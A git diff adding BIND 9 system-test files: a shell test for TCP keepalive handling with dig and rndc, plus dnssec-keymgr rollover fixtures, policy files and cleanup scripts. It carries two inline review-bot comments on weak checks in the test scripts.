@@ -0,0 +1,98 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=.. +. $SYSTEMTESTTOP/conf.sh + +DIGOPTS="-p ${PORT}" +RNDCCMD="$RNDC -c ../common/rndc.conf -s 10.53.0.2 -p ${CONTROLPORT}" + +n=0 +status=0 + +echo_i "checking that dig handles TCP keepalive ($n)" +ret=0 +n=`expr $n + 1` +$DIG $DIGOPTS +qr +keepalive foo.example @10.53.0.2 > dig.out.test$n +grep "; TCP KEEPALIVE" dig.out.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking that dig added TCP keepalive ($n)" +ret=0 +n=`expr $n + 1` +$RNDCCMD stats +grep "EDNS TCP keepalive option received" ns2/named.stats > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking that TCP keepalive is added for TCP responses ($n)" +ret=0 +n=`expr $n + 1` +$DIG $DIGOPTS +vc +keepalive foo.example @10.53.0.2 > dig.out.test$n +grep "; TCP KEEPALIVE" dig.out.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking that TCP keepalive requires TCP ($n)" +ret=0 +n=`expr $n + 1` +$DIG $DIGOPTS +keepalive foo.example @10.53.0.2 > dig.out.test$n +grep "; TCP KEEPALIVE" dig.out.test$n > /dev/null && ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking default value ($n)" +ret=0 +n=`expr $n + 1` +$DIG $DIGOPTS +vc +keepalive foo.example @10.53.0.3 > dig.out.test$n +grep "; TCP KEEPALIVE: 30.0 secs" dig.out.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + 
$ret` + +echo_i "checking configured value ($n)" +ret=0 +n=`expr $n + 1` +$DIG $DIGOPTS +vc +keepalive foo.example @10.53.0.2 > dig.out.test$n +grep "; TCP KEEPALIVE: 15.0 secs" dig.out.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking re-configured value ($n)" +ret=0 +n=`expr $n + 1` +$RNDCCMD tcp-timeouts 300 300 300 200 > output +$DIFF -b output expected || ret=1 +$DIG $DIGOPTS +vc +keepalive foo.example @10.53.0.2 > dig.out.test$n +grep "; TCP KEEPALIVE: 20.0 secs" dig.out.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking server config entry ($n)" +ret=0 +n=`expr $n + 1` +$RNDCCMD stats +oka=`grep "EDNS TCP keepalive option received" ns2/named.stats | \ + tail -1 | awk '{ print $1}'` +$DIG $DIGOPTS bar.example @10.53.0.3 > dig.out.test$n +$RNDCCMD stats +nka=`grep "EDNS TCP keepalive option received" ns2/named.stats | \ + tail -1 | awk '{ print $1}'` +#echo oka ':' $oka +#echo nka ':' $nka +if [ "$oka" -eq "$nka" ]; then ret=1; fi +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "exit status: $status" +[ $status -eq 0 ] || exit 1 diff --git a/bin/tests/system/keymgr/01-ksk-inactive/README b/bin/tests/system/keymgr/01-ksk-inactive/README new file mode 100644 index 0000000..a79314e --- /dev/null +++ b/bin/tests/system/keymgr/01-ksk-inactive/README @@ -0,0 +1,6 @@ +Copyright (C) Internet Systems Consortium, Inc. ("ISC") + +See COPYRIGHT in the source root or https://isc.org/copyright.html for terms. + +This set includes one KSK rollover. The KSK is deactivated prior to +its replacement being activated. diff --git a/bin/tests/system/keymgr/01-ksk-inactive/expect b/bin/tests/system/keymgr/01-ksk-inactive/expect new file mode 100644 index 0000000..bf908e7 --- /dev/null +++ b/bin/tests/system/keymgr/01-ksk-inactive/expect 
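Review bot: The last check in keepalive/tests.sh ("checking server config entry") can pass without measuring anything. If the `grep "EDNS TCP keepalive option received" ns2/named.stats` pipeline prints nothing, `$oka` and `$nka` are both empty, `[ "$oka" -eq "$nka" ]` ends in a usage error instead of a true result, and `ret` stays 0. I would require both counters to be present and the second to be larger, e.g. `[ -n "$oka" ] && [ -n "$nka" ] && [ "$nka" -gt "$oka" ] || ret=1`. The numeric test in keymgr/19-old-keys/extra.sh (`[ "$inactive" -lt "$now" ]`) has the same shape when `$SETTIME` prints nothing.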
@@ -0,0 +1,9 @@
+kargs="example.com"
+kmatch=""
+kret=0
+cargs="-d 1h -m 2h example.com"
+cmatch=""
+cret=0
+warn=0
+error=0
+ok=2
diff --git a/bin/tests/system/keymgr/02-zsk-inactive/README b/bin/tests/system/keymgr/02-zsk-inactive/README
new file mode 100644
index 0000000..8997e0a
--- /dev/null
+++ b/bin/tests/system/keymgr/02-zsk-inactive/README
@@ -0,0 +1,6 @@
+Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+
+See COPYRIGHT in the source root or https://isc.org/copyright.html for terms.
+
+This set includes one ZSK rollover. The first ZSK is deactivated
+prior to its replacement being activated.
diff --git a/bin/tests/system/keymgr/02-zsk-inactive/expect b/bin/tests/system/keymgr/02-zsk-inactive/expect
new file mode 100644
index 0000000..bf908e7
--- /dev/null
+++ b/bin/tests/system/keymgr/02-zsk-inactive/expect
@@ -0,0 +1,9 @@
+kargs="example.com"
+kmatch=""
+kret=0
+cargs="-d 1h -m 2h example.com"
+cmatch=""
+cret=0
+warn=0
+error=0
+ok=2
diff --git a/bin/tests/system/keymgr/03-ksk-unpublished/README b/bin/tests/system/keymgr/03-ksk-unpublished/README
new file mode 100644
index 0000000..4086a31
--- /dev/null
+++ b/bin/tests/system/keymgr/03-ksk-unpublished/README
@@ -0,0 +1,6 @@
+Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+
+See COPYRIGHT in the source root or https://isc.org/copyright.html for terms.
+
+This set contains one KSK rollover. The KSK is unpublished before its
+successor is published.
diff --git a/bin/tests/system/keymgr/03-ksk-unpublished/expect b/bin/tests/system/keymgr/03-ksk-unpublished/expect
new file mode 100644
index 0000000..bf908e7
--- /dev/null
+++ b/bin/tests/system/keymgr/03-ksk-unpublished/expect
@@ -0,0 +1,9 @@
+kargs="example.com"
+kmatch=""
+kret=0
+cargs="-d 1h -m 2h example.com"
+cmatch=""
+cret=0
+warn=0
+error=0
+ok=2
diff --git a/bin/tests/system/keymgr/04-zsk-unpublished/README b/bin/tests/system/keymgr/04-zsk-unpublished/README
new file mode 100644
index 0000000..a3bbe85
--- /dev/null
+++ b/bin/tests/system/keymgr/04-zsk-unpublished/README
@@ -0,0 +1,6 @@
+Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+
+See COPYRIGHT in the source root or https://isc.org/copyright.html for terms.
+
+This set contains one ZSK rollover. The ZSK is unpublished before its
+successor is published.
diff --git a/bin/tests/system/keymgr/04-zsk-unpublished/expect b/bin/tests/system/keymgr/04-zsk-unpublished/expect
new file mode 100644
index 0000000..bf908e7
--- /dev/null
+++ b/bin/tests/system/keymgr/04-zsk-unpublished/expect
@@ -0,0 +1,9 @@
+kargs="example.com"
+kmatch=""
+kret=0
+cargs="-d 1h -m 2h example.com"
+cmatch=""
+cret=0
+warn=0
+error=0
+ok=2
diff --git a/bin/tests/system/keymgr/05-ksk-unpub-active/README b/bin/tests/system/keymgr/05-ksk-unpub-active/README
new file mode 100644
index 0000000..5b47456
--- /dev/null
+++ b/bin/tests/system/keymgr/05-ksk-unpub-active/README
@@ -0,0 +1,7 @@
+Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+
+See COPYRIGHT in the source root or https://isc.org/copyright.html for terms.
+
+This set includes one KSK rollover. The first KSK is deleted
+and its successor published prior to the first KSK being deactivated
+and its successor activated.
diff --git a/bin/tests/system/keymgr/05-ksk-unpub-active/expect b/bin/tests/system/keymgr/05-ksk-unpub-active/expect
new file mode 100644
index 0000000..bf908e7
--- /dev/null
+++ b/bin/tests/system/keymgr/05-ksk-unpub-active/expect
@@ -0,0 +1,9 @@
+kargs="example.com"
+kmatch=""
+kret=0
+cargs="-d 1h -m 2h example.com"
+cmatch=""
+cret=0
+warn=0
+error=0
+ok=2
diff --git a/bin/tests/system/keymgr/06-zsk-unpub-active/README b/bin/tests/system/keymgr/06-zsk-unpub-active/README
new file mode 100644
index 0000000..5b47456
--- /dev/null
+++ b/bin/tests/system/keymgr/06-zsk-unpub-active/README
@@ -0,0 +1,7 @@
+Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+
+See COPYRIGHT in the source root or https://isc.org/copyright.html for terms.
+
+This set includes one KSK rollover. The first KSK is deleted
+and its successor published prior to the first KSK being deactivated
+and its successor activated.
diff --git a/bin/tests/system/keymgr/06-zsk-unpub-active/expect b/bin/tests/system/keymgr/06-zsk-unpub-active/expect
new file mode 100644
index 0000000..bf908e7
--- /dev/null
+++ b/bin/tests/system/keymgr/06-zsk-unpub-active/expect
@@ -0,0 +1,9 @@
+kargs="example.com"
+kmatch=""
+kret=0
+cargs="-d 1h -m 2h example.com"
+cmatch=""
+cret=0
+warn=0
+error=0
+ok=2
diff --git a/bin/tests/system/keymgr/07-ksk-ttl/README b/bin/tests/system/keymgr/07-ksk-ttl/README
new file mode 100644
index 0000000..0830ca3
--- /dev/null
+++ b/bin/tests/system/keymgr/07-ksk-ttl/README
@@ -0,0 +1,6 @@
+Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+
+See COPYRIGHT in the source root or https://isc.org/copyright.html for terms.
+
+This set includes a KSK rollover, with insufficient delay between
+prepublication and rollover.
diff --git a/bin/tests/system/keymgr/07-ksk-ttl/expect b/bin/tests/system/keymgr/07-ksk-ttl/expect
new file mode 100644
index 0000000..03d719c
--- /dev/null
+++ b/bin/tests/system/keymgr/07-ksk-ttl/expect
@@ -0,0 +1,9 @@
+kargs="example.com"
+kmatch=""
+kret=0
+cargs="-d 1w -m 2w example.com"
+cmatch=""
+cret=0
+warn=0
+error=0
+ok=2
diff --git a/bin/tests/system/keymgr/08-zsk-ttl/README b/bin/tests/system/keymgr/08-zsk-ttl/README
new file mode 100644
index 0000000..0830ca3
--- /dev/null
+++ b/bin/tests/system/keymgr/08-zsk-ttl/README
@@ -0,0 +1,6 @@
+Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+
+See COPYRIGHT in the source root or https://isc.org/copyright.html for terms.
+
+This set includes a KSK rollover, with insufficient delay between
+prepublication and rollover.
diff --git a/bin/tests/system/keymgr/08-zsk-ttl/expect b/bin/tests/system/keymgr/08-zsk-ttl/expect
new file mode 100644
index 0000000..03d719c
--- /dev/null
+++ b/bin/tests/system/keymgr/08-zsk-ttl/expect
@@ -0,0 +1,9 @@
+kargs="example.com"
+kmatch=""
+kret=0
+cargs="-d 1w -m 2w example.com"
+cmatch=""
+cret=0
+warn=0
+error=0
+ok=2
diff --git a/bin/tests/system/keymgr/09-no-keys/README b/bin/tests/system/keymgr/09-no-keys/README
new file mode 100644
index 0000000..7de6d40
--- /dev/null
+++ b/bin/tests/system/keymgr/09-no-keys/README
@@ -0,0 +1,5 @@
+Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+
+See COPYRIGHT in the source root or https://isc.org/copyright.html for terms.
+
+This directory has no key set, but one will be initialized by dnssec-keymgr.
diff --git a/bin/tests/system/keymgr/09-no-keys/expect b/bin/tests/system/keymgr/09-no-keys/expect
new file mode 100644
index 0000000..03d719c
--- /dev/null
+++ b/bin/tests/system/keymgr/09-no-keys/expect
@@ -0,0 +1,9 @@
+kargs="example.com"
+kmatch=""
+kret=0
+cargs="-d 1w -m 2w example.com"
+cmatch=""
+cret=0
+warn=0
+error=0
+ok=2
diff --git a/bin/tests/system/keymgr/10-change-roll/README b/bin/tests/system/keymgr/10-change-roll/README
new file mode 100644
index 0000000..c83de5f
--- /dev/null
+++ b/bin/tests/system/keymgr/10-change-roll/README
@@ -0,0 +1,7 @@
+Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+
+See COPYRIGHT in the source root or https://isc.org/copyright.html for terms.
+
+This directory has a key set which is valid, but has a ZSK rollover period
+of only three months. It will be updated to have a ZSK rollover period of
+one year.
diff --git a/bin/tests/system/keymgr/10-change-roll/expect b/bin/tests/system/keymgr/10-change-roll/expect
new file mode 100644
index 0000000..03d719c
--- /dev/null
+++ b/bin/tests/system/keymgr/10-change-roll/expect
@@ -0,0 +1,9 @@
+kargs="example.com"
+kmatch=""
+kret=0
+cargs="-d 1w -m 2w example.com"
+cmatch=""
+cret=0
+warn=0
+error=0
+ok=2
diff --git a/bin/tests/system/keymgr/11-many-simul/README b/bin/tests/system/keymgr/11-many-simul/README
new file mode 100644
index 0000000..0830ca3
--- /dev/null
+++ b/bin/tests/system/keymgr/11-many-simul/README
@@ -0,0 +1,6 @@
+Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+
+See COPYRIGHT in the source root or https://isc.org/copyright.html for terms.
+
+This set includes a KSK rollover, with insufficient delay between
+prepublication and rollover.
diff --git a/bin/tests/system/keymgr/11-many-simul/expect b/bin/tests/system/keymgr/11-many-simul/expect
new file mode 100644
index 0000000..03d719c
--- /dev/null
+++ b/bin/tests/system/keymgr/11-many-simul/expect
@@ -0,0 +1,9 @@
+kargs="example.com"
+kmatch=""
+kret=0
+cargs="-d 1w -m 2w example.com"
+cmatch=""
+cret=0
+warn=0
+error=0
+ok=2
diff --git a/bin/tests/system/keymgr/12-many-active/README b/bin/tests/system/keymgr/12-many-active/README
new file mode 100644
index 0000000..0830ca3
--- /dev/null
+++ b/bin/tests/system/keymgr/12-many-active/README
@@ -0,0 +1,6 @@
+Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+
+See COPYRIGHT in the source root or https://isc.org/copyright.html for terms.
+
+This set includes a KSK rollover, with insufficient delay between
+prepublication and rollover.
diff --git a/bin/tests/system/keymgr/12-many-active/expect b/bin/tests/system/keymgr/12-many-active/expect
new file mode 100644
index 0000000..67fc4e9
--- /dev/null
+++ b/bin/tests/system/keymgr/12-many-active/expect
@@ -0,0 +1,9 @@
+kargs="-f example.com"
+kmatch=""
+kret=0
+cargs="-d 1w -m 2w example.com"
+cmatch=""
+cret=0
+warn=0
+error=0
+ok=2
diff --git a/bin/tests/system/keymgr/13-noroll/README b/bin/tests/system/keymgr/13-noroll/README
new file mode 100644
index 0000000..0830ca3
--- /dev/null
+++ b/bin/tests/system/keymgr/13-noroll/README
@@ -0,0 +1,6 @@
+Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+
+See COPYRIGHT in the source root or https://isc.org/copyright.html for terms.
+
+This set includes a KSK rollover, with insufficient delay between
+prepublication and rollover.
diff --git a/bin/tests/system/keymgr/13-noroll/expect b/bin/tests/system/keymgr/13-noroll/expect
new file mode 100644
index 0000000..67fc4e9
--- /dev/null
+++ b/bin/tests/system/keymgr/13-noroll/expect
@@ -0,0 +1,9 @@
+kargs="-f example.com"
+kmatch=""
+kret=0
+cargs="-d 1w -m 2w example.com"
+cmatch=""
+cret=0
+warn=0
+error=0
+ok=2
diff --git a/bin/tests/system/keymgr/14-wrongalg/README b/bin/tests/system/keymgr/14-wrongalg/README
new file mode 100644
index 0000000..0830ca3
--- /dev/null
+++ b/bin/tests/system/keymgr/14-wrongalg/README
@@ -0,0 +1,6 @@
+Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+
+See COPYRIGHT in the source root or https://isc.org/copyright.html for terms.
+
+This set includes a KSK rollover, with insufficient delay between
+prepublication and rollover.
diff --git a/bin/tests/system/keymgr/14-wrongalg/expect b/bin/tests/system/keymgr/14-wrongalg/expect
new file mode 100644
index 0000000..bd5eadb
--- /dev/null
+++ b/bin/tests/system/keymgr/14-wrongalg/expect
@@ -0,0 +1,9 @@
+kargs="example.com"
+kmatch=""
+kret=0
+cargs="-d 1w -m 2w example.com"
+cmatch=""
+cret=0
+warn=0
+error=0
+ok=4
diff --git a/bin/tests/system/keymgr/15-unspec/README b/bin/tests/system/keymgr/15-unspec/README
new file mode 100644
index 0000000..0830ca3
--- /dev/null
+++ b/bin/tests/system/keymgr/15-unspec/README
@@ -0,0 +1,6 @@
+Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+
+See COPYRIGHT in the source root or https://isc.org/copyright.html for terms.
+
+This set includes a KSK rollover, with insufficient delay between
+prepublication and rollover.
diff --git a/bin/tests/system/keymgr/15-unspec/expect b/bin/tests/system/keymgr/15-unspec/expect
new file mode 100644
index 0000000..ad300c4
--- /dev/null
+++ b/bin/tests/system/keymgr/15-unspec/expect
@@ -0,0 +1,9 @@
+kargs=""
+kmatch=""
+kret=0
+cargs="-d 1w -m 2w example.com"
+cmatch=""
+cret=0
+warn=0
+error=0
+ok=2
diff --git a/bin/tests/system/keymgr/16-wrongalg-unspec/README b/bin/tests/system/keymgr/16-wrongalg-unspec/README
new file mode 100644
index 0000000..0830ca3
--- /dev/null
+++ b/bin/tests/system/keymgr/16-wrongalg-unspec/README
@@ -0,0 +1,6 @@
+Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+
+See COPYRIGHT in the source root or https://isc.org/copyright.html for terms.
+
+This set includes a KSK rollover, with insufficient delay between
+prepublication and rollover.
diff --git a/bin/tests/system/keymgr/16-wrongalg-unspec/expect b/bin/tests/system/keymgr/16-wrongalg-unspec/expect
new file mode 100644
index 0000000..c836535
--- /dev/null
+++ b/bin/tests/system/keymgr/16-wrongalg-unspec/expect
@@ -0,0 +1,9 @@
+kargs=""
+kmatch=""
+kret=0
+cargs="-d 1w -m 2w example.com"
+cmatch=""
+cret=0
+warn=0
+error=0
+ok=4
diff --git a/bin/tests/system/keymgr/17-noforce/README b/bin/tests/system/keymgr/17-noforce/README
new file mode 100644
index 0000000..0830ca3
--- /dev/null
+++ b/bin/tests/system/keymgr/17-noforce/README
@@ -0,0 +1,6 @@
+Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+
+See COPYRIGHT in the source root or https://isc.org/copyright.html for terms.
+
+This set includes a KSK rollover, with insufficient delay between
+prepublication and rollover.
diff --git a/bin/tests/system/keymgr/17-noforce/expect b/bin/tests/system/keymgr/17-noforce/expect
new file mode 100644
index 0000000..029a4e9
--- /dev/null
+++ b/bin/tests/system/keymgr/17-noforce/expect
@@ -0,0 +1,9 @@
+kargs="example.com"
+kmatch=""
+kret=1
+cargs="-d 1w -m 2w example.com"
+cmatch=""
+cret=0
+warn=0
+error=0
+ok=2
diff --git a/bin/tests/system/keymgr/18-nonstd-prepub/README b/bin/tests/system/keymgr/18-nonstd-prepub/README
new file mode 100644
index 0000000..4ee0a8a
--- /dev/null
+++ b/bin/tests/system/keymgr/18-nonstd-prepub/README
@@ -0,0 +1,7 @@
+Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+
+See COPYRIGHT in the source root or https://isc.org/copyright.html for terms.
+
+This directory has a key set which is valid, but will expire within
+the rollover period. The prepublication interval in policy.conf is a
+nonstandard value.
diff --git a/bin/tests/system/keymgr/18-nonstd-prepub/expect b/bin/tests/system/keymgr/18-nonstd-prepub/expect
new file mode 100644
index 0000000..e8518d8
--- /dev/null
+++ b/bin/tests/system/keymgr/18-nonstd-prepub/expect
@@ -0,0 +1,9 @@
+kargs="example.com"
+kmatch=""
+kret=0
+cargs="-d 1h -m 1d example.com"
+cmatch=""
+cret=0
+warn=0
+error=0
+ok=2
diff --git a/bin/tests/system/keymgr/18-nonstd-prepub/policy.conf.in b/bin/tests/system/keymgr/18-nonstd-prepub/policy.conf.in
new file mode 100644
index 0000000..757311a
--- /dev/null
+++ b/bin/tests/system/keymgr/18-nonstd-prepub/policy.conf.in
@@ -0,0 +1,20 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+policy default {
+ policy global;
+ algorithm @DEFAULT_ALGORITHM@;
+ pre-publish zsk 2w;
+ roll-period zsk 6mo;
+ coverage 364d;
+};
diff --git a/bin/tests/system/keymgr/19-old-keys/README b/bin/tests/system/keymgr/19-old-keys/README
new file mode 100644
index 0000000..bd66ba8
--- /dev/null
+++ b/bin/tests/system/keymgr/19-old-keys/README
@@ -0,0 +1,7 @@
+Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+
+See COPYRIGHT in the source root or https://isc.org/copyright.html for terms.
+
+This directory has a key set which is valid, but which was published
+and activated more than one rollover period ago. dnssec-keymgr should
+not mark the keys as already being inactive and deleted.
diff --git a/bin/tests/system/keymgr/19-old-keys/expect b/bin/tests/system/keymgr/19-old-keys/expect
new file mode 100644
index 0000000..ad73b53
--- /dev/null
+++ b/bin/tests/system/keymgr/19-old-keys/expect
@@ -0,0 +1,12 @@
+kargs="example.com"
+kmatch=""
+kret=0
+cargs="-d 1h -m 1w example.com"
+cmatch="4,Publish
+4,Activate
+2,Inactive
+2,Delete"
+cret=0
+warn=0
+error=0
+ok=2
diff --git a/bin/tests/system/keymgr/19-old-keys/extra.sh b/bin/tests/system/keymgr/19-old-keys/extra.sh
new file mode 100644
index 0000000..502d951
--- /dev/null
+++ b/bin/tests/system/keymgr/19-old-keys/extra.sh
@@ -0,0 +1,23 @@
+#!/bin/sh
+
+# Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+#
+# SPDX-License-Identifier: MPL-2.0
+#
+# This Source Code Form is subject to the terms of the Mozilla Public
+# License, v. 2.0. If a copy of the MPL was not distributed with this
+# file, you can obtain one at https://mozilla.org/MPL/2.0/.
+#
+# See the COPYRIGHT file distributed with this work for additional
+# information regarding copyright ownership.
+
+now=`$PERL -e 'print time()."\n";'`
+for keyfile in K*.key; do
+ inactive=`$SETTIME -upI $keyfile | awk '{print $2}'`
+ if [ "$inactive" = UNSET ]; then
+ continue
+ elif [ "$inactive" -lt "$now" ]; then
+ echo_d "inactive date is in the past"
+ ret=1
+ fi
+done
diff --git a/bin/tests/system/keymgr/19-old-keys/policy.conf.in b/bin/tests/system/keymgr/19-old-keys/policy.conf.in
new file mode 100644
index 0000000..757311a
--- /dev/null
+++ b/bin/tests/system/keymgr/19-old-keys/policy.conf.in
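Review bot: Only the Inactive time is inspected in 19-old-keys/extra.sh (`$SETTIME -upI`), while the README for this directory says dnssec-keymgr should not mark the keys as already being inactive and deleted. If the Delete time is meant to be covered too, read it the same way with `deleted=$($SETTIME -upD "$keyfile" | awk '{print $2}')` and apply the same UNSET/past comparison to it. `ret` is only assigned here and `echo_d` is not defined in this file, so the script presumably runs sourced from the keymgr test driver; a one-line comment at the top saying so would make that dependency visible.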
@@ -0,0 +1,20 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+policy default {
+ policy global;
+ algorithm @DEFAULT_ALGORITHM@;
+ pre-publish zsk 2w;
+ roll-period zsk 6mo;
+ coverage 364d;
+};
diff --git a/bin/tests/system/keymgr/clean.sh b/bin/tests/system/keymgr/clean.sh
new file mode 100644
index 0000000..d8cad32
--- /dev/null
+++ b/bin/tests/system/keymgr/clean.sh
@@ -0,0 +1,21 @@
+#!/bin/sh
+
+# Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+#
+# SPDX-License-Identifier: MPL-2.0
+#
+# This Source Code Form is subject to the terms of the Mozilla Public
+# License, v. 2.0. If a copy of the MPL was not distributed with this
+# file, you can obtain one at https://mozilla.org/MPL/2.0/.
+#
+# See the COPYRIGHT file distributed with this work for additional
+# information regarding copyright ownership.
+
+rm -f 18-nonstd-prepub/policy.conf
+rm -f 19-old-keys/policy.conf
+rm -f K*.key */K*.key
+rm -f K*.private */K*.private
+rm -f coverage.* keymgr.* settime.*
+rm -f ns*/managed-keys.bind*
+rm -f policy.conf
+rm -f policy.out
diff --git a/bin/tests/system/keymgr/policy.conf.in b/bin/tests/system/keymgr/policy.conf.in
new file mode 100644
index 0000000..d6bc925
--- /dev/null
+++ b/bin/tests/system/keymgr/policy.conf.in
@@ -0,0 +1,23 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+policy default {
+ policy global;
+ algorithm @DEFAULT_ALGORITHM@;
+ key-size zsk 1024;
+ pre-publish zsk 6w;
+ post-publish zsk 6w;
+ roll-period zsk 6mo;
+ roll-period ksk 0;
+ coverage 364d;
+};
diff --git a/bin/tests/system/keymgr/policy.good b/bin/tests/system/keymgr/policy.good
new file mode 100644
index 0000000..eb23246
--- /dev/null
+++ b/bin/tests/system/keymgr/policy.good
@@ -0,0 +1,187 @@ +policy default: + inherits global + directory None + algorithm None + coverage None + ksk_keysize None + zsk_keysize None + ksk_rollperiod None + zsk_rollperiod None + ksk_prepublish None + ksk_postpublish None + zsk_prepublish None + zsk_postpublish None + ksk_standby None + zsk_standby None + keyttl None + +policy global: + inherits None + directory None + algorithm RSASHA256 + coverage 15552000 + ksk_keysize 2048 + zsk_keysize 2048 + ksk_rollperiod None + zsk_rollperiod 31536000 + ksk_prepublish 2592000 + ksk_postpublish 2592000 + zsk_prepublish 2592000 + zsk_postpublish 2592000 + ksk_standby None + zsk_standby None + keyttl 3600 + +constructed policy example.com: + inherits global + directory None + algorithm RSASHA256 + coverage 15552000 + ksk_keysize 2048 + zsk_keysize 2048 + ksk_rollperiod None + zsk_rollperiod 31536000 + ksk_prepublish 2592000 + ksk_postpublish 2592000 + zsk_prepublish 2592000 + zsk_postpublish 2592000 + ksk_standby None + zsk_standby None + keyttl 3600 + +policy default: + inherits None + directory "keydir" + algorithm RSASHA1 + coverage 31536000 + ksk_keysize None + zsk_keysize None + ksk_rollperiod None + zsk_rollperiod 15552000 + ksk_prepublish None + ksk_postpublish None + zsk_prepublish 3628800 + zsk_postpublish 3628800 + ksk_standby None + zsk_standby None + keyttl 3600 + +zone policy example.com: + inherits extra + directory "keydir" + algorithm NSEC3RSASHA1 + coverage 12960000 + ksk_keysize 2048 + zsk_keysize 2048 + ksk_rollperiod 31536000 + zsk_rollperiod 7776000 + ksk_prepublish 7776000 + ksk_postpublish None + zsk_prepublish 3628800 + zsk_postpublish 604800 + ksk_standby None + zsk_standby None + keyttl 7200 + +constructed policy example.org: + inherits None + directory "keydir" + algorithm RSASHA1 + coverage 31536000 + ksk_keysize 2048 + zsk_keysize 1024 + ksk_rollperiod None + zsk_rollperiod 15552000 + ksk_prepublish None + ksk_postpublish None + zsk_prepublish 3628800 + zsk_postpublish 3628800 + ksk_standby 
None + zsk_standby None + keyttl 3600 + +constructed policy example.net: + inherits None + directory "keydir" + algorithm RSASHA1 + coverage 31536000 + ksk_keysize 2048 + zsk_keysize 1024 + ksk_rollperiod None + zsk_rollperiod 15552000 + ksk_prepublish None + ksk_postpublish None + zsk_prepublish 3628800 + zsk_postpublish 3628800 + ksk_standby None + zsk_standby None + keyttl 3600 + +algorithm policy RSASHA1: + inherits None + directory None + algorithm None + coverage None + ksk_keysize 2048 + zsk_keysize 1024 + ksk_rollperiod None + zsk_rollperiod None + ksk_prepublish None + ksk_postpublish None + zsk_prepublish None + zsk_postpublish None + ksk_standby None + zsk_standby None + keyttl None + +algorithm policy RSASHA256: + inherits None + directory None + algorithm RSASHA256 + coverage None + ksk_keysize 2048 + zsk_keysize 2048 + ksk_rollperiod None + zsk_rollperiod None + ksk_prepublish None + ksk_postpublish None + zsk_prepublish None + zsk_postpublish None + ksk_standby None + zsk_standby None + keyttl None + +algorithm policy ECDSAP256SHA256: + inherits None + directory None + algorithm ECDSAP256SHA256 + coverage None + ksk_keysize None + zsk_keysize None + ksk_rollperiod None + zsk_rollperiod None + ksk_prepublish None + ksk_postpublish None + zsk_prepublish None + zsk_postpublish None + ksk_standby None + zsk_standby None + keyttl None + +policy extra: + inherits default + directory None + algorithm None + coverage 157680000 + ksk_keysize None + zsk_keysize None + ksk_rollperiod 31536000 + zsk_rollperiod 7776000 + ksk_prepublish 7776000 + ksk_postpublish None + zsk_prepublish None + zsk_postpublish 604800 + ksk_standby None + zsk_standby None + keyttl 7200 + diff --git a/bin/tests/system/keymgr/policy.sample b/bin/tests/system/keymgr/policy.sample new file mode 100644 index 0000000..8683e27 --- /dev/null +++ b/bin/tests/system/keymgr/policy.sample 
